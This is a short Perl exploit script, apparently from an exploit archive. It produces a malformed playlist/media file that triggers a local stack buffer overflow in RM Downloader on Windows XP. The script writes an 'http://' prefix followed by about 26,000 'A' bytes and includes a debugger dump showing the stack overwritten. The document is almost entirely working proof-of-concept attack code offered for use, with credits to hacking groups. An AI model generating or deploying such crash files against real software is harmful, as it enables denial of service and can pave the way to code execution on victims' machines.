|
#!/usr/bin/perl
#[+] Bug : RM Downloader (.Ram/.Smi/ .pls/ .smil/ .wax/ .wpl File) Local Stack Overflow
#[+] Author : the_Edit0r
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2
#[+] Big thnx: Expl0iters.ir * Anti-security.ir
########################################################################################
# 0012F920 |00168370 ASCII "AAAA"
# 0012F924 |41410004
# 0012F928 |41414141
# 0012F92C |41414141
# 0012F930 |41414141
# 0012F934 |41414141
# 0012F938 |41414141
# 0012F93C |41414141
# 0012F940 |41414141
# 0012F944 |41414141
# 0012F948 |41414141
########################################################################################
my $crash="http://"."\x41\x41\x41\x41\x41\x41\x41\x41\x41" x 2901;
open(myfile,'>>Edit0r.ggg'); #/smi , pls , smil , wax , wpl
print myfile $crash;
print "File Created successfully\n";
########################################################################################
|